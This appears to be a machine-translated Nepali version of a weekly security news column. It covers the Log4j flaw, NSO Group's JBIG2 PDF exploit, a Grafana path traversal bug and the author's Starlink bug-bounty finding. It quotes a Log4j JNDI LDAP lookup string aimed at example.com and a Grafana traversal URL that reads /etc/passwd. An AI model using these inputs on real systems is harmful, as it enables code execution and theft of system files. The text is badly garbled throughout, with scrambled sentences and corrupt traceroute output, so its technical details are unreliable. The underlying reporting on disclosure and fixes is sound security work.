विशाल यो हप्ता समाचार अन्तिम हप्ताको स्तम्भ समावेश गर्न राम्रो लेट रूपमा केही घण्टा तोडने, Log4j छ। मान्छे पहिले नै सोध्दै हुनुहुन्छ भने यो यो चलिरहेको कम्तीमा जस्तै यो देखिदैन साथै, कहिल्यै सबैभन्दा गम्भीर समस्याका छ। बग पहिलो सुरक्षा नोभेम्बर 24 मा दोष को अपाचे सूचित गर्ने, Alibaba मा विशेषज्ञहरु द्वारा फेला परेन। साथै प्रारम्भिक डिसेम्बर 1st रूपमा जंगली मा समस्याका प्रमाण फेला पारेका रूपमा Cloudflare, आफ्नो डाटा झिकेर छ। यी प्रारम्भिक उदाहरण एकदमै विरल साथै अत्यन्तै, यदि यो समस्या मा थप अनुसन्धान अध्ययन गरिरहेको पनि प्रारम्भिक खुलासा भाग थिए अनुसन्धानकर्ताहरूले थिएन मलाई केरकार गर्न पर्याप्त लक्षित छन्। बिना डिसेम्बर 9th मा, एक ट्विटर व्यक्तिगत समस्याका विवरण, साथै सुरक्षा नरक छाडा भङ्ग रूपमा tweeted। नौ मिनेट Tweet पछि, प्रयास Cloudflare देख्यो साथै आठ घण्टा भित्र रूपमा, तिनीहरूले 20,000 सामना थिए, फेरि शोषण प्रति मिनेट प्रयासहरू शोषण।
त्यो तथापि के संग शोषण मा, साथै यो किन यति खराब छ जा गर्नुपर्छ, समय हो? पहिलो, कमजोर बन्डल Log4j, Java लागि लग पुस्तकालय हो। यसलाई तथापि समावेश whistles Bells धेरै साथै संग, तिनीहरूले आवश्यकता जान कहाँ लग सन्देशहरू प्राप्त गर्न प्रक्रिया सक्षम बनाउँछ। ती सुविधाहरू एक JNDI, जावा मा एक बुझे सुरक्षा समस्या लागि समर्थन छ। एक JNDI अनुरोध deserialization आक्रमण, जहाँ यो वस्तु फिर्ता फराकिलो गर्दा आगमन डाटा प्रवाह maliciously दुर्व्यवहार विकृत छ, गर्न सक्छ। यो भनाइको तात्पर्य थियो लागि ती JNDI lookups इन्टरनेट मार्फत प्रदर्शन गर्न, तर त्यहाँ एउटा स्पष्ट यस व्यवहार को लागि निरीक्षण थियो त्यसैले दायाँ यहाँ हामी।
{: LDAP: //example.com/a jndi}, तपाईं मिसिन मा मनपरी कोड चलाउन सक्नुहुन्छ अन्तिम विचार तपाईं समावेश $ log4j एक लग रचना ट्रिगर गर्न सक्छन् भने छ। अनुसन्धानकर्ताहरूले साथै अपराधीहरूलाई पहिले नै ब्राउजर-एजेन्ट मा स्ट्रिङ, वा धेरै नाम सहित जस्तै कि ह्यान्डल गर्न नवीन विधिहरू साथ आएका छन्। हो, यो बिट बबी Tables.Log4j 2.16.0 को फिर्ती छ। 2.15.0 तर पूर्ण प्राप्त समस्या को छुटकारा थिएन, आंशिक तय समावेश गर्यो। एउटा अद्यावधिक Java त्यसै गरी आंशिक निवारण प्रदान, एक पूर्वनिर्धारित सेटिङ बदल छ। तर हामी यो अन्त सम्भवत अहिलेसम्म देखेको छैन।
एक पीडीएफ मा NSO साथै सीपीयू Emulated
यो गुगलको काम शून्य यो कथा बताउन भन्दा अन्य जो कोहीलाई पनि भएको थियो, म यो एक गरिब हलिउड षड्यन्त्र उपकरणको रूपमा बन्द Blown छन्। यो समस्याका यो .gif कि पीडीएफ डाटा साँच्चै समावेश डाटा ह्याण्डल साथै ठ्याक्कै कसरी, iOS iMessage अनुप्रयोगमा छ। PDF हरू यो सौम्य राख्न, लचिलो छन्। बाट कोडेक को 2000. भाग संकुचित ब्लक बीच सानातिना मतभेद प्रतिनिधित्व गर्न, बुलियन संचालक उपयोग गर्न र, या XOR, साथै XNOR को क्षमता छ सम्भावित शैलीहरू इन्कोडिङ एक JBIG2, कालो साथै सेतो सङ्कुचन कोडेक छ। को decompression कोड मा एक पूर्णांक ओभरफ्लो धेरै स्मृति मान्य मतलब जो decompression कोड थप स्मृति ती बुलियन संचालक चलाउन सक्छ, decompression लागि उत्पादन बारेमा विचार गर्न सक्षम बनाउँछ।
अब के तपाईं स्मृति धेरै साथै ती चार संचालक हुँदा तपाईं प्राप्त गर्छन्? एक Turing कुल सीपीयू, पाठ्यक्रम। हो, NSO समूह मा अनुसन्धानकर्ताहरूले साँच्चै एक पीडीएफ डिकोडिङ तालिका मा एक अनलाइन सीपीयू, साथै आफ्नो स्यान्डबक्स भाग्ने सुस्तरी बुटस्ट्रैप कि मंच उपयोग रूपमा विकास गरे। यो पागल अकल्पनीय, साथै शानदार छ। [एड नोट: साथै गरिबहरूलाई NSO समूह अनिवार्य दुष्ट छ।]
Grafana बाटो ट्राभर्सल
को Grafana दृश्य मंच बस बस हालै एक गम्भीर समस्या, CVE-2021-43798 मिलाएका छौं। यो समस्याका बाटो ट्राभर्सल प्लगइन फोल्डरहरू मार्फत सक्षम बनाउँछ। त्यसैले उदाहरणका लागि, /public/plugins/alertlist/../../../../../../../../etc/passwd एक लिनक्स सर्भर बाट पासवर्डफाइल डाटा फिर्ता हुनेछ। यो समस्या फिक्सिंग को अपडेट डिसेम्बर 7 मा जारी गरियो। यो बग साँच्चै 0 दिन केही दिनको लागि, यो सार्वजनिक भएको 3rd मा छलफल भइरहेको थियो, को Grafana devs गर्न तथापि अज्ञात थियो। विवरण लागि आफ्नो शवपरीक्षा बाहिर निरीक्षण।
Starlink
र अन्तमा, म आवरण केही मूल अनुसन्धान अध्ययन छ। तपाईं Starlink उपग्रह वेब सिस्टम कवर मेरो काम परिचित हुन सक्छ। एक $ 4,800 इनाम को ट्युन गर्न – Starlink साथै खरीद राखन लागि गति को भाग साथै, मञ्चमा सुरक्षा अनुसन्धान अध्ययन गर्न भनेर लक्ष्य अन्ततः केही फल जन्म भएको छ रूपमा थियो। यहाँ कथा छ।
म एक नजिकको द्वारा त्यसै Starlink, साथै डिसेम्बर 7 मा utilizes गर्ने मित्र, हामी दुवै एक सार्वजनिक routable IPv4 ठेगाना नियुक्त गरिएको थियो फेला पारेका छन्। ठ्याक्कै सदस्यहरू बीच Starlink गरेको मार्ग काम कसरी गर्छ? के वेब आफ्नो मेरो नेटवर्कबाट पठाइएको ट्राफिक उपग्रह सिधै निर्देशित हुन, वा प्रत्येक प्याकेटमा उपग्रह बन्द बाउन्स गर्न, फिर्ता चरा गर्न त रूपमा अन्ततः फिर्ता मलाई हुनेछ SpaceX गरेको जमीन स्टेशन संग, साथै? यो प्रश्नको जवाफ रूपमा ट्र्यासरुट GenericName साथै एक अद्भुत उपकरण हो,:
98.97.92.x गर्न ट्र्यासरुट GenericName (98.97.92.x), he0 हप्स अधिकतम, 46 46 बाइट प्याकेटहरू
1 ग्राहकको .dltstxx1.pop.starlinkisp.net (.98..97.80.80.1) 2 MS 2 MS 2 MS 2 MS 2 MS 2 MS 2 MS 2 MSED.0820 MS 2 MSED.0820
2 12 122.16.248.68 (122.168.248.248383838383838 MS 23.9633333 mss एमएस
12 122.16.248.21 (122.168.248.248.21) 2.7228 एमएस 2 268880 MS 2 H सुश्री
A U US USSEFENDE.HOSTAMLHOSTHOSHOST (98 98.97.92.420 MS 51.474777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777577
हामीले प्रत्येक हप, जे भए पनि, तथापिका थोरै रूपमा बुझ्न सकेनौं, र प्रत्येकले अपेक्षाकृत रूपमा यसलाई हटाउन सक्दछ जुन हाम्रो वेब ट्राफिक जमिन स्टेशनको साथ जाँदै थियो। जबकि यस पर्चार्को बारेमा केहि अनौंठो छ। के तपाईंले यो क्षेत्र गर्नुभयो? 172.16.X.X.Y एक व्यक्तिगत नेटवर्क हो, आरएफसी 1 18 184 अनुसार। यो सत्य हो कि यसले पर्चार्यतमा देखाउँदछ कि मेरो ओपनवार्ट राउटर साथै स्टारलिंक उपकरणहरू मेरो डेस्कटपबाट त्यस ठेगानामा प्रभावकारी रूपमा राउट हुन्छ। अब मैले यस प्रकारको कुरा पहिले पत्ता लगाएको छु, फरक आईएसपीको नेटवर्कमा। यो बुझ्नु कि यो चाखलाग्दो हुन सक्छ, मैले NAMAP को साथसाथै व्यक्तिगत आईपीएसलाई संचालन गरेँ जुन ट्रेचुइटमा देखा पर्यो। बिंगो।
122.16.248.2 ठीकसँग लक गरिएको थियो, यद्यपि 122.16.248.21 ले खुला पोर्टहरू देखाए। अर्थात्, पोर्ट 17 ,, 1 0000, 1 10101, साथै 5000051। NMAP विश्वास 1797 मा विश्वास गरिएको थियो। यद्यपि उनीहरू बाँकी? Telnet। म अपेक्षाकृत सकारात्मक थिए कि यी मध्ये कुनै पनि वास्तवमै telnet सेवाहरू थिएनन्, यद्यपि यो एक शानदार सुरु हुन्छ जब एक अज्ञात सेवा निर्धारण गर्दछ। यो कुनै अपवाद थिएन। पोर्ट 00 0000 साथै 90101 ले मलाई भन्यो कि मैले एक गरीब अनुरोध गरेको छु, त्रुटि 40000s थ्रो। आह, तिनीहरू http सेवाहरू थिए! एक वेब ब्राउजरमा दुबैलाई तान्न मलाई एक डिबग आउटपुट प्रदान गरियो जुन एक पाइथन फ्लास्क सर्भरबाट देखा पर्यो।
त्यो अन्तिम पोर्ट, 50051, चाखलाग्दो थियो। केवल सेवा मैले पत्ता लगाउन सक्दछु कि सामान्य रूपमा दगुर्ज गरिएको थियो, एक टाढाको प्रक्रिया फोन कल प्रोटोलोल। ग्रिपेक_क्लीको प्रमाणीकरण गर्न ग्रिपेकमा आए जुन मैले फेला पारेको थियो। दुर्भाग्यवस प्रतिबिम्ब अक्षम पारियो, यसको मतलब सेवाले आदेशहरूलाई समर्थन गर्ने आदेशहरू भन्ने गर्न अस्वीकार गर्यो। कुनै पनि प्रकारको कमाण्डको कमाण्डले त्यो पोर्टमा धेरै डाटा फ्याँक्नेछ।
यस बिन्दुमा मैले ठीकसँग प्रश्न गर्न थालें कि मैले कुन कुरामा कडा हार्डवेबादी हो। यो BGP थियो, यो स्टारलिंक नेटवर्कको नेटवर्कमा आन्तरिक थियो, साथै मेरो वेब ट्राफिक यसको साथ कराइरहेको थियो। के यो एक उपग्रह हुन सक्छ? सम्भवतः होइन, तथापि स्टारलिंक बग विपत्ति अर्को के हो भनेर हटाउछ। कुनै पनि परिस्थितिमा अनुसन्धानकर्ताले उपग्रह वा अन्य महत्त्वपूर्ण पूर्वाधारमा अनलाइन टेस्टिंग गर्नुहोस्। मलाई शंका लागेको छ कि म उनीहरूको राउटिंग पूर्वाधारको अंशमा बोल्दै थिएँ, प्राय जसो मुल्लाहरूको भूमि स्टेशनमा बोल्दै थिए। जे भए पनि, टेक्वाको रूपमा पनि पिकिंगका साथै केही तोड्दा केही भाँचिएको थियो, त्यसैले मैले भेट्टाएको कुरामा खुलासा मिलेर बनेको थिएँ।
स्टारलिंक ईन्जिनियरहरू रिपोर्टको बाह्र घण्टा भित्र बन्दरगाहमा बन्द भए पनि, साथै मलाई उनीहरूको ट्राइज डबल गर्न भनियो। निश्चित, जबकि म अझै व्यक्तिगत आईपीएसलाई पि ing गर्न सक्दछु, कुनै पोर्टहरू खुला थिएनन्। यहाँ छ कि जहाँ मैले ईतिहासलाई श्रेयमा क्रेडिट गर्ने केटाहरूलाई क्रेडिट दिनै पर्छ जुन स्पेसको स्टारलिटिंक बग विसै चलाउँदछन्। उनीहरूले यसलाई एक साधारण जानकारी खुलासा गरे, केहि सय डललुक्त, साथै यसलाई एक दिन भनिन्छ। यसको सट्टामा, तिनीहरूले अनुसन्धान गर्न समय लिएका थिए कि मैले खुलायन ग्रिपेक पोर्ट फेला पारेको साथसाथै पनि, साथै त्यसपछि यो बमहनिहित विश्रामको बिन्दु हो। ओसटस्टिंग ओसेटेड ओसटेको $,, 0000 प्रारम्भिक पुरस्कार, प्लस एक इनाम को साथै एक विस्तृत रिपोर्ट को लागी साथै आफ्नो अनलाइन प्रणाली क्र्यास छैन। मेरो क्षेत्रीय साथी आधा चलिरहेकोले यसलाई राखिन्छ, त्यो NMAP चल्नको लागि धेरै पैसा हो।
हो, त्यहाँ केहि भाग्य थियो, नेटवर्क क्विर्कको साथ सम्पूर्ण अनुभवको सम्पूर्ण ठूलो सौदाको साथ एक विशेष ठूलो सौदाको साथ थियो। प्राथमिक शुक्रवे हुनु पर्छ कि सुरक्षा अनुसंधान अध्ययन सँधै सुपर चुनौतीपूर्ण जोखिमका साथै शोषण विकासको रूपमा हुँदैन। तपाईंले PDF मा एक टर्मिंग-पूर्ण प्रणाली विकास गर्नुपर्दैन। कहिलेकाँही यो आईपीको साथ साथै आईपीको साथसाथै पोर्ट स्क्यान, दृढताका साथ एकीकृत र एक थोडा को एक बिट संग एकीकृत। वास्तवमा, यदि तपाईंको आईएसपीको बग बिच कार्यक्रम छ भने, तपाईं सिधा मोडेममा प्लग गर्न प्रयास गर्न सक्नुहुनेछ, साथै व्यक्तिगत आईपी दायरा स्क्यान गर्दै। तपाईंको आँखा खुला राख्नुहोस्। तपाईं साथै केवल केहि चाखलाग्दो कुरा पत्ता लगाउन सक्नुहुन्छ।